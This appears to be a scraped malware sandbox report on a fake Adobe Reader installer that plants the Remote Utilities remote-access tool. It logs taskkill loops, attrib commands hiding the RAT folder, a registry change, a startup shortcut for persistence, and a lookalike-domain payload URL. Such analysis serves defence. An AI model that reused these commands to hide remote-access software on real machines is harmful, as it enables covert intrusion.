Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='3256Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='3256' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' EXE_CMD_LINE='/exenoupdates /exelang 0 /noprereqs ' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: unknown	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' AI_RESUME=1 ADDLOCAL=MainFeature,RequiredApplication PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: unknown	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='2404Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='2404' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_RESUME='1' TARGETDIR='C:\' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='3256Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='3256' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' EXE_CMD_LINE='/exenoupdates /exelang 0 /noprereqs ' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' AI_RESUME=1 ADDLOCAL=MainFeature,RequiredApplication PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='2404Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='2404' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_RESUME='1' TARGETDIR='C:\' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'

Language, Device and Operating System Detection:

Queries information about the installed CPU (vendor, model number etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the installation date of Windows

Show sources

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\collecting.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\collecting.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\collecting.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\preparing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\installing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\finalizing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\collecting.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\preparing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\installing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\finalizing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Queries the cryptographic machine GUID

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Remote Access Functionality:

Detected Remote Utilities RAT

Show sources

Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host\.'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: C:\Windows\regedit.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Usoris\Remote Utilities Host\Host\Parameters Options

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
10:31:45	API Interceptor	29x Sleep call for process: CDaNsQ7Rrd.exe modified
10:31:46	API Interceptor	1244x Sleep call for process: msiexec.exe modified
10:33:29	API Interceptor	21x Sleep call for process: taskeng.exe modified
10:33:34	API Interceptor	98x Sleep call for process: tasklist.exe modified
10:33:37	API Interceptor	24x Sleep call for process: find.exe modified
10:33:43	API Interceptor	1x Sleep call for process: 7zaa.exe modified
10:33:54	API Interceptor	1x Sleep call for process: installer.exe modified
10:33:55	API Interceptor	1016x Sleep call for process: taskkill.exe modified
10:33:56	API Interceptor	11x Sleep call for process: attrib.exe modified
10:34:00	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\armwake.lnk
10:34:01	API Interceptor	2x Sleep call for process: reg.exe modified
10:34:05	API Interceptor	1x Sleep call for process: regedit.exe modified
10:34:11	API Interceptor	104x Sleep call for process: fp.exe modified
10:34:16	API Interceptor	1093x Sleep call for process: explorer.exe modified
10:34:21	API Interceptor	4x Sleep call for process: dllhost.exe modified
10:34:24	API Interceptor	2x Sleep call for process: cscript.exe modified

Antivirus Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CDaNsQ7Rrd.exe	0%	virustotal		Browse
CDaNsQ7Rrd.exe	0%	metadefender		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\HERBBL~1\AppData\Local\Temp\7ZipSfx.000\installer.exe	9%	virustotal	Browse
C:\Users\HERBBL~1\AppData\Local\Temp\7ZipSfx.000\installer.exe	6%	metadefender	Browse
C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\Prereq.dll	0%	virustotal	Browse

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
adobemacromedia.com	3%	virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://adobemacromedia.com/setup.exe	3%	virustotal		Browse
http://adobemacromedia.com/setup.exe	0%	Avira URL Cloud	safe
http://www.advancedinstaller.com0	0%	Avira URL Cloud	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENET-CloudFlareIncUS	53Cheque10741.pdf.z.exe	454678e7cd95477d250dad1e987c1201f4e969d6bc20c3d987bcf75ddf1ff1ee	malicious	Browse	104.24.29.29
	MalhaFinaApp.exe	9b12c0617c26fb330406e3e6f382f58c5dbe2652f1c6e3c3464ecd6f8148de16	malicious	Browse	104.31.10.172
	e1e89c87-9f66-11e7-8388-80e65024849.exe	89dbde4056616e40aa07744ca89b611de5978c050bd17f58112801807a9d7ee2	malicious	Browse	104.16.91.188
	wccftech.com		malicious	Browse	104.20.11.37
	https://web.airdroid.com		malicious	Browse	104.16.20.35
	mzN17oSU6p.js	b2272e6d165a35ba1174c8b957c01844e6db0f366873c89fee2ff0f18d9c1af6	malicious	Browse	104.20.74.28
	mssecsvc.exe	dbf3890b782ac04136c3336814eef97e3c0f4133f9592e882c131c179161b27b	malicious	Browse	104.17.38.137
	uRYgdrK9N.exe	4f9246ba1efd8c4fe60da2ad48a50cc8473df8462596944cd1d326a0f30041c3	malicious	Browse	104.17.68.104
	67Order.exe	cebe3b664d64c97a7683a0fad06e6c45affe0deb8c15fb3e37552b97a6be5938	malicious	Browse	104.16.17.96
	5INV & P.L.exe	74ecf02ce3b8b94374b2f867b143abbb4439d19023105fbb2d3a4970269216c9	malicious	Browse	104.16.18.96
	http://ksksks.barsiksuperkot.org/?utm_medium=0b55674fb5dbcffa531ca5159eb4b7420bc4fb78&utm_campaign=177		malicious	Browse	104.31.94.164
	TEST1.doc	1c5b8339a0865d607c627ba1c29d0dd3968bce2bb2f85e2bc3e8302c08ea8635	malicious	Browse	104.20.209.21
	67quotatio.exe	236a137f3628a01f3b5d98a17062a1b014de25f4f7c4a5acd7c8b4c8daa39d44	malicious	Browse	104.31.92.140
	41proforma invoice.exe	82f08793b891d357626e5f68a232b36c6b02e6b2dec6062143cfc249b2d34566	malicious	Browse	104.16.17.96
	http://imprismail.com/affiliate/referral.asp?site=rea&url=pop/en/ukc/1&aff_id=5843_27027_19234_535127_1_357_		malicious	Browse	104.20.63.152
	d5#U309a.doc	7bb52f08b24ad4122cdbd6d18869278b92be14ca07298fd8311d7c2e6b89f968	malicious	Browse	104.20.209.21
	30PO-1639.exe	1b92ac282dfa32fe1286f60fec9855cdfa8b702ff256253f3d17521ffea9ae5e	malicious	Browse	104.17.68.104
	11Order # 000001122.exe	e37cdbfa767e77da871daf75556887f08969fdc1bed27d716d72ca6803d04519	malicious	Browse	104.16.17.96
	43wallet.aes.js.js	bf573b716bc0afd48c474c7bc88b817beced81277e37796fde009f6d0b52df6f	malicious	Browse	104.27.160.33
	https://indimetalsac.com/aah/scan.html		malicious	Browse	104.27.138.193
TIMEWEB-ASRU	Informationen940934865.doc	aa6b8004d075bd0180a4a17ba1815658c9162df7cd313ba6246b278f812142f8	malicious	Browse	92.53.96.13
	2018-01-10_12-13-23.exe	cb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050	malicious	Browse	92.53.105.14
	2017-12-28-Rig-EK-landing-page.html	1b2017ee03927583f72cde2c06da3886f04dd1f76182029194b2105379e78a8c	malicious	Browse	176.57.214.103
	Invoices attached.doc	97d3814120b3441950ab9b0ca6676420cf968d90900a037644d5cce08c14816f	malicious	Browse	92.53.96.178
	Document-needed.doc	f877a8406d60ae5c3fce22da9512425b089dbc8da56016fbed2f5985b49a5ae8	malicious	Browse	92.53.96.178
	#U437#U430 #U430#U43f#U440#U435#U43b#U44c.js	b61f1c4f35fe01ff926d8a7d8b91ed95d83ce565a1db5838f38f074f3a7aa700	malicious	Browse	92.53.96.18
	12 #U430#U43f#U440 2018.js	dc383b9ba9083572d2cba7885048f82df700e61f65680b358aa7d3518a3532ca	malicious	Browse	92.53.96.18
	12 #U430#U43f#U440 2018.js	dc383b9ba9083572d2cba7885048f82df700e61f65680b358aa7d3518a3532ca	malicious	Browse	92.53.96.18
	http://www.mixturro.com/LLC/Invoice/		malicious	Browse	92.53.96.107
	Invoices attached.doc	97d3814120b3441950ab9b0ca6676420cf968d90900a037644d5cce08c14816f	malicious	Browse	92.53.96.178
	Document-needed.doc	f877a8406d60ae5c3fce22da9512425b089dbc8da56016fbed2f5985b49a5ae8	malicious	Browse	92.53.96.178
	Hancitor25.04.doc	42c23d01becdf472da20e1e2f20316a56fd549a36cec0ac9967f730e2fded31b	malicious	Browse	92.53.107.93
	2018_4_26_april.js	9a33838947857a3d9717a55b81540b21dd53a3b1d626edac29d922262b31e557	malicious	Browse	92.53.118.146
	2018_4_26_april.js	9a33838947857a3d9717a55b81540b21dd53a3b1d626edac29d922262b31e557	malicious	Browse	92.53.118.146
	45CanadaPost.js	86aad7dfdf743575bb58c78dfe529447305e97b141d7f680384513f62661644d	malicious	Browse	92.53.118.144
	53Purchase Order.exe	92ebf38bc6442dc52502d891b81ca1d085425b6f38343ce9efc9887d3cca96df	malicious	Browse	92.53.96.139
	30Label_000115602.doc.js	b18422d3d33fce0a3d32f01e6bae2c9fde695eb00bcecc7c570429eae7e2fe16	malicious	Browse	92.53.96.94
	HHemAoXDg.exe	5c32e0d2a69fd77e85f2eecaabeb677b6f816de0d82bf7c29c9d124a818f424f	malicious	Browse	188.225.46.219
	Emotet.doc	f04475ef220a30546e1f7f5628c3059a3a0fbcc968e5992f79a8edb12d9c7096	malicious	Browse	92.53.118.146
	#U437#U430 #U430#U43f#U440#U435#U43b#U44c.js	b61f1c4f35fe01ff926d8a7d8b91ed95d83ce565a1db5838f38f074f3a7aa700	malicious	Browse	92.53.96.18

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\inst_fold\7za.dll	tes2.exe	d5d121c266920034026c83be987253b6c8a47b6d7a35147fe6c9f7b9e6c25e06	malicious	Browse
C:\inst_fold\7zaa.exe	tes2.exe	d5d121c266920034026c83be987253b6c8a47b6d7a35147fe6c9f7b9e6c25e06	malicious	Browse
C:\inst_fold\7zaa.exe	runme.exe	5cb1c8a2c2e0f782e2d6c61db8bff3febfd7d271bc3e33864c719896d70ac7e6	malicious	Browse

Screenshots

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report CDaNsQ7Rrd.exe

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Spreading:

Networking:

DDoS:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Remote Access Functionality:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshots